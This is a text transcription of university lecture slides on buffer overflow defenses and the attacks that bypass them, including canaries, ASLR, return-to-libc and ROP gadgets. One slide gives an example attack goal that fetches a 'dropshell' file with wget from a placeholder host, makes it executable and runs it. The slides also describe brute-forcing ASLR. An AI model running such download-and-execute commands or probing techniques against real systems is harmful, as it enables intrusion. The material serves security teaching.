BUFFER OVERFLOW DEFENSES & COUNTERMEASURES
|
|
- Kathleen Simmons
- 6 years ago
- Views:
Transcription
1 BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB
2 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess the raw address) Getting to point to our code (dist buff to stored eip)
3 DETECTING OVERFLOWS WITH CANARIES text %ebp &arg1 buffer
4 DETECTING OVERFLOWS WITH CANARIES text %ebp &arg1 buffer
5 DETECTING OVERFLOWS WITH CANARIES text d e2 10 %ebp &arg1 buffer canary
6 DETECTING OVERFLOWS WITH CANARIES text d e2 10 nop %ebp nop nop &arg1 0xbdf \x0f \x3c \x2f... buffer canary
7 DETECTING OVERFLOWS WITH CANARIES text d e2 10 nop %ebp nop nop &arg1 0xbdf \x0f \x3c \x2f... buffer canary
8 DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort text d e2 10 nop %ebp nop nop &arg1 0xbdf \x0f \x3c \x2f... buffer canary
9 DETECTING OVERFLOWS WITH CANARIES Not the expected value: abort text d e2 10 nop %ebp nop nop &arg1 0xbdf \x0f \x3c \x2f... buffer canary What value should the canary have?
10 CANARY VALUES From StackGuard [Wagle & Cowan] 1. Terminator canaries (CR, LF, NULL, -1) Leverages the fact that scanf etc. don t allow these 2. Random canaries Write a new random each process start Save the real value somewhere in memory Must write-protect the stored value 3. Random XOR canaries Same as random canaries But store canary XOR some control info, instead
11 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Option: Make this detectable with canaries Finding the return address (guess the raw address) Getting to point to our code (dist buff to stored eip)
12 ADDRESS SPACE LAYOUT RANDOMIZATION 4G Set when process starts Runtime cmdline & env Stack Heap 0xffffffff int f() { int x; malloc(sizeof(long)); Known at compile time Uninit d data static int x; Init d data Text static const int y=10; 0 0x Randomize where exactly these regions start
13 ADDRESS SPACE LAYOUT RANDOMIZATION Shortcomings of ASLR Introduces return-to-libc atk Probes for location of usleep On 32-bit architectures, only 16 bits of entropy fork() keeps same offsets
14 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Option: Make this detectable with canaries Finding the return address (guess the raw address) Address Space Layout Randomization (ASLR) Getting to point to our code (dist buff to stored eip)
15 GETTING %EIP TO POINT TO OUR CODE Recall that all memory has Read, Write, and Execute permissions 4G cmdline & env 0xffffffff Must be readable & writeable Stack Heap But does it need to be executable? Must be executable 0 Uninit d data Init d data Text Basic idea: make the stack non-executable 0x
16 RETURN TO LIBC Exploit:
17 RETURN TO LIBC Exploit: Preferred: strlcpy char buf[4]; strncpy(buf, hello!, sizeof(buf)); strlcpy(buf, hello!, sizeof(buf)); buf = { h, e, l, l } buf = { h, e, l, \0 }
18 RETURN TO LIBC Exploit: Goal: system( wget ; chmod +x dropshell ;./dropshell ); Challenge: Non-executable stack Insight: system already exists somewhere in libc
19 RETURN TO LIBC text %ebp &arg buffer stack frame
20 RETURN TO LIBC padding text %ebp &arg xbdf 0xbdf xbdf... buffer stack frame
21 RETURN TO LIBC padding good guess text %ebp &arg xbdf 0xbdf xbdf... buffer stack frame
22 RETURN TO LIBC padding good guess nop sled text %ebp &arg xbdf 0xbdf xbdf... nop nop nop buffer stack frame
23 RETURN TO LIBC padding good guess nop sled malicious code text %ebp &arg xbdf 0xbdf xbdf... nop nop nop \x0f \x3c \x2f... buffer stack frame
24 RETURN TO LIBC padding good guess nop sled malicious code text %ebp &arg xbdf 0xbdf xbdf... nop nop nop \x0f \x3c \x2f... buffer stack frame
25 RETURN TO LIBC padding good guess nop sled malicious code text %ebp &arg xbdf 0xbdf xbdf... nop nop nop \x0f \x3c \x2f... buffer stack frame PANIC: address not executable
26 RETURN TO LIBC libc... usleep() printf()... system()... text %ebp &arg buffer
27 RETURN TO LIBC libc... usleep() printf()... system()... padding text %ebp &arg buffer
28 RETURN TO LIBC libc... usleep() printf()... system()... padding text %ebp &arg buffer
29 RETURN TO LIBC libc... usleep() printf()... system()... padding arguments text %ebp &arg buffer wget example.com/...
30 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? padding arguments text %ebp &arg buffer wget example.com/...
31 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? padding arguments text %ebp &arg wget example.com/... buffer How do we ensure these are the args?
32 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp &arg1 buffer wget example.com/... %esp %ebp leave: mov %ebp %esp pop %ebp ret: pop
33 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp &arg1 buffer wget example.com/... %esp %ebp leave: mov %ebp %esp pop %ebp ret: pop
34 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 buffer wget example.com/... %esp %ebp leave: mov %ebp %esp pop %ebp ret: pop
35 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 buffer wget example.com/... %ebp leave: mov %ebp %esp pop %ebp %esp ret: pop
36 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 buffer wget example.com/... %ebp%esp leave: mov %ebp %esp pop %ebp ret: pop
37 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 wget example.com/... buffer %ebp %esp leave: ret: At this point, we can t reliably access local variables mov %ebp %esp pop %ebp pop
38 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 wget example.com/... buffer %ebp %esp leave: ret: At this point, we can t reliably access local variables mov %ebp %esp pop %ebp pop
39 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 wget example.com/... buffer %ebp %esp leave: mov %ebp %esp pop %ebp ret: pop
40 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF DEADBEEF &arg1 wget example.com/... buffer %ebp %esp leave: mov %ebp %esp pop %ebp ret: pop
41 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF DEADBEEF &arg1 buffer %esp wget example.com/... %ebp
42 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... Will expect args at 8(%ebp) padding arguments text %ebp DEADBEEF DEADBEEF &arg1 buffer %esp wget example.com/... %ebp
43 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF DEADBEEF &arg1 padding buffer %esp wget example.com/... %ebp
44 ARGUMENTS WHEN WE ARE SMASHING %EBP? libc system: pushl %ebp movl %esp, %ebp... usleep() printf()... system()... padding arguments text %ebp DEADBEEF DEADBEEF &arg1 padding buffer wget example.com/... %esp %ebp At this point, we can reliably access local variables
45 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? padding arguments text %ebp &arg wget example.com/... buffer How do we ensure these are the args?
46 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? padding arguments text %ebp &arg1 padding wget example.com/... buffer How do we ensure these are the args? By prepending 4 byte padding
47 INFERRING ADDRESSES WITH ASLR known delta (by version of libc) libc... usleep() printf()... system()... padding arguments text %ebp DEADBEEF &arg1 DEADBEEF... AAAAAAAAAAAAAAAA buffer 0x
48 INFERRING ADDRESSES WITH ASLR known delta (by version of libc) libc... usleep() printf()... system()... Repeatedly guess the address of usleep padding arguments text %ebp DEADBEEF &arg1 DEADBEEF... AAAAAAAAAAAAAAAA buffer 0x
49 INFERRING ADDRESSES WITH ASLR known delta (by version of libc) libc... usleep() printf()... system()... Repeatedly guess the address of usleep padding arguments text %ebp DEADBEEF &arg1 DEADBEEF... AAAAAAAAAAAAAAAA x buffer 0x = smallest number w/o 0-byte 16 million == 16 sec of sleep Wrong guess of usleep = crash; retry Correct guess of usleep = response in 16 sec
50 INFERRING ADDRESSES WITH ASLR known delta (by version of libc) libc... usleep() printf()... system()... Repeatedly guess the address of usleep padding arguments text %ebp DEADBEEF &arg1 DEADBEEF... AAAAAAAAAAAAAAAA x buffer Why this works Every connection causes a fork; fork() does not re-randomize ASLR 0x = smallest number w/o 0-byte 16 million == 16 sec of sleep Wrong guess of usleep = crash; retry Correct guess of usleep = response in 16 sec
51 RETURN TO LIBC libc... usleep() printf()... system()... How do we guess this address? By first guessing usleep padding arguments text %ebp &arg1 padding wget example.com/... buffer How do we ensure these are the args? By prepending 4 byte padding
52 DEFENSE: JUST GET RID OF SYSTEM()? libc!... usleep() printf()... system()... padding arguments text %ebp &arg1 padding wget example.com/... buffer Idea: Remove any function call that (a) is not needed and (b) could wreak havoc system() exec() connect() open()...
53 RELATED IDEA: SECCOMP-BPF
54 RELATED IDEA: SECCOMP-BPF Linux system call enabled since (2005) Affected process can subsequently only perform read, write, exit, and sigreturn system calls - No support for open call: Can only use already-open file descriptors Isolates a process by limiting possible interactions
55 RELATED IDEA: SECCOMP-BPF Linux system call enabled since (2005) Affected process can subsequently only perform read, write, exit, and sigreturn system calls - No support for open call: Can only use already-open file descriptors Isolates a process by limiting possible interactions Follow-on work produced seccomp-bpf Limit process to policy-specific set of system calls, subject to a policy handled by the kernel - Policy akin to Berkeley Packet Filters (BPF) Used by Chrome, OpenSSH, vsftpd, and others
56 RETURN-ORIENTED PROGRAMMING Shortcomings of removing functions from libc Introduces return-oriented programming Shows that a nontrivial amount of code will have enough code to permit virtually any ROP attack
57 CODE SEQUENCES IN LIBC Code sequences exist in libc that were not placed there by the compiler Find code sequences by starting at ret s ( 0xc3 ) and looking backwards for valid instructions
58 GADGETS leave: ret: mov %ebp %esp pop %ebp pop
59 GADGETS leave: ret: mov %ebp %esp pop %ebp pop
60 GADGETS leave: ret: mov %ebp %esp pop %ebp pop %edx now set to 0xdeadbeef
61 GADGETS leave: ret: mov %ebp %esp pop %ebp pop Effect: sets %edx to 0xdeadbeef
62 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3
63 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3
64 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3
65 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3
66 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 3
67 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 3
68 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 3
69 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 3
70 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 3
71 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 10
72 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 10
73 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 10
74 GADGETS leave: ret: mov %ebp %esp pop %ebp pop 7 %edi %edx %eax 7 10
75 GADGETS next gadget 7 %edi %edx %eax 7 10
76 GADGETS Effect: adds 7 to %eax next gadget 7 %edi %edx %eax 7 10
77 GADGETS Effect: adds 7 to %eax next gadget Had to deal with the side-effect of push %edi 7 %edi %edx %eax 7 10
78 GADGETS %eax %ebx %ecx %edx
79 GADGETS %eax %ebx %ecx %edx 0
80 GADGETS %eax %ebx %ecx %edx 0
81 GADGETS %eax %ebx %ecx %edx 0 0x0b0b0b0b
82 GADGETS %eax %ebx %ecx %edx 0 0x0b0b0b0b
83 GADGETS %eax %ebx %ecx %edx 0 0x0b0b0b0b
84 GADGETS %eax %ebx %ecx %edx 0 0x0b0b0b0b 0
85 GADGETS %eax %ebx %ecx %edx 0xb 0x0b0b0b0b 0
86 GADGETS %eax %ebx %ecx %edx 0xb 0x0b0b0b0b 0
87 GADGETS %eax %ebx %ecx %edx 0xb 0x0b0b0b0b 0
88 GADGETS %eax %ebx %ecx %edx 0xb 0x0b0b0b0b 0
89 GADGETS %eax %ebx %ecx %edx 0xb 0
90 GADGETS %eax %ebx %ecx %edx 0xb 0
91 GADGETS %eax %ebx %ecx %edx 0xb 0
92 GADGETS %eax %ebx %ecx %edx 0xb 0 Effect: shell code
93 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Option: Make this detectable with canaries Getting to point to our code (dist buff to stored eip) Non-executable stack doesn t work so well Finding the return address (guess the raw address) Address Space Layout Randomization (ASLR) Best defense: Good programming practices
94 BUFFER OVERFLOW PREVALENCE Significant percent of all vulnerabilities Data from the National Vulnerability Database
This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask
This time We will continue Buffer overflows By looking at Overflow Defenses and other memory safety vulnerabilities Everything you ve always wanted to know about gdb but were too afraid to ask Overflow
More informationBuffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts
This time We will begin our 1st section: Software Security By investigating Buffer overflows and other memory safety vulnerabilities History Memory layouts Buffer overflow fundamentals Software security
More informationReturn-orientated Programming
Return-orientated Programming or The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) Hovav Shacham, CCS '07 Return-Oriented oriented Programming programming
More informationCSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko
CSE 127: Computer Security Control Flow Hijacking Kirill Levchenko October 17, 2017 Control Flow Hijacking Defenses Avoid unsafe functions Stack canary Separate control stack Address Space Layout Randomization
More informationArchitecture-level Security Vulnerabilities
Architecture-level Security Vulnerabilities Björn Döbel Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The Battlefield:
More informationLecture 08 Control-flow Hijacking Defenses
Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation
More informationThe Geometry of Innocent Flesh on the Bone
The Geometry of Innocent Flesh on the Bone Return-into-libc without Function Calls (on the x86) Hovav Shacham hovav@cs.ucsd.edu CCS 07 Technical Background Gadget: a short instructions sequence (e.x. pop
More informationBiography. Background
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com
More informationCS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly
Raluca Popa Spring 2018 CS 161 Computer Security Discussion 1 Week of January 22, 2018: GDB and x86 assembly Objective: Studying memory vulnerabilities requires being able to read assembly and step through
More informationCountermeasures in Modern Operating Systems. Yves Younan, Vulnerability Research Team (VRT)
Countermeasures in Modern Operating Systems Yves Younan, Vulnerability Research Team (VRT) Introduction Programs in C/C++: memory error vulnerabilities Countermeasures (mitigations): make exploitation
More informationArchitecture-level Security Vulnerabilities. Julian Stecklina
Architecture-level Security Vulnerabilities Julian Stecklina Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The
More informationExploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it
Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier
More informationSoftware Security: Buffer Overflow Defenses
CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin,
More informationExploits and gdb. Tutorial 5
Exploits and gdb Tutorial 5 Exploits and gdb 1. Buffer Vulnerabilities 2. Code Injection 3. Integer Attacks 4. Advanced Exploitation 5. GNU Debugger (gdb) Buffer Vulnerabilities Basic Idea Overflow or
More informationBetriebssysteme und Sicherheit Sicherheit. Buffer Overflows
Betriebssysteme und Sicherheit Sicherheit Buffer Overflows Software Vulnerabilities Implementation error Input validation Attacker-supplied input can lead to Corruption Code execution... Even remote exploitation
More informationFrom Over ow to Shell
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ Google, December 2018 1 / 25 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail:
More informationCNIT 127: Exploit Development. Ch 1: Before you begin. Updated
CNIT 127: Exploit Development Ch 1: Before you begin Updated 1-14-16 Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend, such as Denial
More informationAdvanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2
Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2 Clemens Hlauschek, Christian Schanes INSO Industrial Software Institute of Information Systems Engineering Faculty of
More informationPractical Malware Analysis
Practical Malware Analysis Ch 4: A Crash Course in x86 Disassembly Revised 1-16-7 Basic Techniques Basic static analysis Looks at malware from the outside Basic dynamic analysis Only shows you how the
More informationReturn Oriented Programming
ROP gadgets Small instruction sequence ending with a ret instruction 0xc3 Gadgets are found in existing, resident code and libraries There exist tools to search for and find gadgets Gadgets are put together
More informationCSC 591 Systems Attacks and Defenses Return-into-libc & ROP
CSC 591 Systems Attacks and Defenses Return-into-libc & ROP Alexandros Kapravelos akaprav@ncsu.edu NOEXEC (W^X) 0xFFFFFF Stack Heap BSS Data 0x000000 Code RW RX Deployment Linux (via PaX patches) OpenBSD
More informationUniversità Ca Foscari Venezia
Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 2 Question 1 Software Vulnerabilities (15 min) For the following code, assume an attacker can control the value of basket passed into eval basket.
More information2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks
Runtime attacks are major threats to today's applications Control-flow of an application is compromised at runtime Typically, runtime attacks include injection of malicious code Reasons for runtime attacks
More informationCSC 405 Computer Security Stack Canaries & ASLR
CSC 405 Computer Security Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer overflow defenses
More informationIs stack overflow still a problem?
Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains
More informationCMSC 313 Lecture 12. Project 3 Questions. How C functions pass parameters. UMBC, CMSC313, Richard Chang
Project 3 Questions CMSC 313 Lecture 12 How C functions pass parameters UMBC, CMSC313, Richard Chang Last Time Stack Instructions: PUSH, POP PUSH adds an item to the top of the stack POP
More informationBeyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed
More informationROP It Like It s Hot!
Wednesday, December 3, 14 2014 Red Canari, Inc. All rights reserved. 1 I N F O R M AT I O N S E C U R I T Y ROP It Like It s Hot! A 101 on Buffer Overflows, Return Oriented Programming, & Shell- code Development
More informationX86 Stack Calling Function POV
X86 Stack Calling Function POV Computer Systems Section 3.7 Stack Frame Reg Value ebp xffff FFF0 esp xffff FFE0 eax x0000 000E Memory Address Value xffff FFF8 xffff FFF4 x0000 0004 xffff FFF4 x0000 0003
More informationISA564 SECURITY LAB. Shellcode. George Mason University
ISA564 SECURITY LAB Shellcode George Mason University Outline Shellcode Basics Advanced Shellcode What is shellcode? Machine code used as the payload in the exploitation of a software bug Whenever altering
More informationString Oriented Programming Exploring Format String Attacks. Mathias Payer
String Oriented Programming Exploring Format String Attacks Mathias Payer Motivation Additional protection mechanisms prevent many existing attack vectors Format string exploits are often overlooked Drawback:
More informationSungkyunkwan University
November, 1988 Internet Worm attacks thousands of Internet hosts. How did it happen? November, 1988 Internet Worm attacks thousands of Internet hosts. How did it happen? July, 1999 Microsoft launches MSN
More informationAdvanced Buffer Overflow
Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2016/2017 Department of Electrical and Electronic Engineering
More informationIntroduction to Computer Systems , fall th Lecture, Sep. 28 th
Introduction to Computer Systems 15 213, fall 2009 9 th Lecture, Sep. 28 th Instructors: Majd Sakr and Khaled Harras Last Time: Structures struct rec { int i; int a[3]; int *p; }; Memory Layout i a p 0
More informationBuffer Overflow Attack
Buffer Overflow Attack What every applicant for the hacker should know about the foundation of buffer overflow attacks By (Dalgona@wowhacker.org) Email: zinwon@gmail.com 2005 9 5 Abstract Buffer overflow.
More informationRobust Shell Code Return Oriented Programming and HeapSpray. Zhiqiang Lin
CS 6V81-05: System Security and Malicious Code Analysis Robust Shell Code Return Oriented Programming and HeapSpray Zhiqiang Lin Department of Computer Science University of Texas at Dallas April 16 th,
More informationCMPSC 497: Midterm Review
CMPSC 497: Midterm Review Trent Jaeger Systems and Internet Infrastructure Security (SIIS) Lab Computer Science and Engineering Department Pennsylvania State University Page 1 Midterm Format True/False
More informationSecure Programming Lecture 3: Memory Corruption I (Stack Overflows)
Secure Programming Lecture 3: Memory Corruption I (Stack Overflows) David Aspinall, Informatics @ Edinburgh 24th January 2017 Outline Roadmap Memory corruption vulnerabilities Instant Languages and Runtimes
More informationModule: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security
CSE543 - Introduction to Computer and Network Security Module: Return-oriented Programming Professor Trent Jaeger 1 1 Anatomy of Control-Flow Exploits Two steps in control-flow exploitation First -- attacker
More informationLecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller
Lecture 10 Return-oriented programming Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller ROP Overview Idea: We forge shellcode out of existing application
More informationCPEG421/621 Tutorial
CPEG421/621 Tutorial Compiler data representation system call interface calling convention Assembler object file format object code model Linker program initialization exception handling relocation model
More informationCSE 509: Computer Security
CSE 509: Computer Security Date: 2.16.2009 BUFFER OVERFLOWS: input data Server running a daemon Attacker Code The attacker sends data to the daemon process running at the server side and could thus trigger
More informationIntroduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins
Introduction to Reverse Engineering Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins Reverse Engineering (of Software) What is it? What is it for? Binary exploitation (the cool
More informationRoadmap: Security in the software lifecycle. Memory corruption vulnerabilities
Secure Programming Lecture 3: Memory Corruption I (introduction) David Aspinall, Informatics @ Edinburgh 24th January 2019 Roadmap: Security in the software lifecycle Security is considered at different
More informationCMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING
CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING LECTURE 16, SPRING 2013 TOPICS TODAY Project 6 Perils & Pitfalls of Memory Allocation C Function Call Conventions in Assembly Language PERILS
More informationWriting Exploits. Nethemba s.r.o.
Writing Exploits Nethemba s.r.o. norbert.szetei@nethemba.com Motivation Basic code injection W^X (DEP), ASLR, Canary (Armoring) Return Oriented Programming (ROP) Tools of the Trade Metasploit A Brief History
More informationLinux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.
Lecture 6B Machine-Level Programming V: Miscellaneous Topics Topics Linux Memory Layout Understanding Pointers Buffer Overflow Upper 2 hex digits of address Red Hat v. 6.2 ~1920MB memory limit FF C0 Used
More informationSmashing the Buffer. Miroslav Štampar
Smashing the Buffer Miroslav Štampar (mstampar@zsis.hr) Summary BSidesVienna 2014, Vienna (Austria) November 22nd, 2014 2 Buffer overflow (a.k.a.) Buffer overrun An anomaly where a program, while writing
More informationANITA S SUPER AWESOME RECITATION SLIDES
ANITA S SUPER AWESOME RECITATION SLIDES 15/18-213: Introduction to Computer Systems Stacks and Buflab, 11 Jun 2013 Anita Zhang, Section M WHAT S NEW (OR NOT) Bomblab is due tonight, 11:59 PM EDT Your late
More informationAssembly Language: Function Calls" Goals of this Lecture"
Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and returning" Passing parameters" Storing local variables" Handling registers without interference"
More informationTopics. What is a Buffer Overflow? Buffer Overflows
Buffer Overflows CSC 482/582: Computer Security Slide #1 Topics 1. What is a Buffer Overflow? 2. The Most Common Implementation Flaw. 3. Process Memory Layout. 4. The Stack and C s Calling Convention.
More informationThe first Secure Programming Laboratory will be today! 3pm-6pm in Forrest Hill labs 1.B31, 1.B32.
Lab session this afternoon Memory corruption attacks Secure Programming Lecture 6: Memory Corruption IV (Countermeasures) David Aspinall, Informatics @ Edinburgh 2nd February 2016 The first Secure Programming
More informationCSE 127 Computer Security
CSE 127 Computer Security Alex Gantman, Spring 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on
More informationStack -- Memory which holds register contents. Will keep the EIP of the next address after the call
Call without Parameter Value Transfer What are involved? ESP Stack Pointer Register Grows by 4 for EIP (return address) storage Stack -- Memory which holds register contents Will keep the EIP of the next
More informationAssembly Language: Function Calls" Goals of this Lecture"
Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and urning" Passing parameters" Storing local variables" Handling registers without interference"
More informationNew York University CSCI-UA : Advanced Computer Systems: Spring 2016 Midterm Exam
New York University CSCI-UA.480-008: Advanced Computer Systems: Spring 2016 Midterm Exam This exam is 75 minutes. Stop writing when time is called. You must turn in your exam; we will not collect it. Do
More informationCS 31: Intro to Systems Functions and the Stack. Martin Gagne Swarthmore College February 23, 2016
CS 31: Intro to Systems Functions and the Stack Martin Gagne Swarthmore College February 23, 2016 Reminders Late policy: you do not have to send me an email to inform me of a late submission before the
More informationReturn oriented programming
Return oriented programming TOOR - Computer Security Hallgrímur H. Gunnarsson Reykjavík University 2012-05-04 Introduction Many countermeasures have been introduced to foil EIP hijacking: W X: Prevent
More informationOutline. Memory Exploit
Outline CS 6V81-05: System Security and Malicious Code Analysis Robust Shell Code Return Oriented Programming and HeapSpray Zhiqiang Lin Department of Computer Science University of Texas at Dallas April
More informationSoftware Security: Buffer Overflow Attacks (continued)
CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Attacks (continued) Spring 2015 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,
More informationThe geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler
The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86) Hovav Shacham presented by: Fabian Fäßler return-oriented programming Hovav Shacham presented by: Fabian
More informationAssembly Language: Function Calls
Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and returning Passing parameters Storing local variables Handling registers without interference
More informationModule: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security
CSE543 - Introduction to Computer and Network Security Module: Return-oriented Programming Professor Trent Jaeger 1 Anatomy of Control-Flow Exploits 2 Anatomy of Control-Flow Exploits Two steps in control-flow
More informationCSE 127 Computer Security
CSE 127 Computer Security Stefan Savage, Fall 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on the
More informationbuffer overflow exploitation
buffer overflow exploitation Samuele Andreoli, Nicolò Fornari, Giuseppe Vitto May 11, 2016 University of Trento Introduction 1 introduction A Buffer Overflow is an anomaly where a program, while writing
More informationSecure Programming Lecture 6: Memory Corruption IV (Countermeasures)
Secure Programming Lecture 6: Memory Corruption IV (Countermeasures) David Aspinall, Informatics @ Edinburgh 2nd February 2016 Outline Announcement Recap Containment and curtailment Tamper detection Memory
More informationSoftware Security: Buffer Overflow Attacks
CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Attacks (continued) Autumn 2018 Tadayoshi (Yoshi) Kohno yoshi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,
More informationRegister Allocation, iii. Bringing in functions & using spilling & coalescing
Register Allocation, iii Bringing in functions & using spilling & coalescing 1 Function Calls ;; f(x) = let y = g(x) ;; in h(y+x) + y*5 (:f (x
More informationCSE 127: Computer Security. Memory Integrity. Kirill Levchenko
CSE 127: Computer Security Memory Integrity Kirill Levchenko November 18, 2014 Stack Buffer Overflow Stack buffer overflow: writing past end of a stackallocated buffer Also called stack smashing One of
More informationCSE 127 Computer Security
CSE 127 Computer Security Stefan Savage, Spring 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on
More informationCNIT 127: Exploit Development. Ch 3: Shellcode. Updated
CNIT 127: Exploit Development Ch 3: Shellcode Updated 1-30-17 Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object files strace System Call Tracer Removing
More informationX86 Review Process Layout, ISA, etc. CS642: Computer Security. Drew Davidson
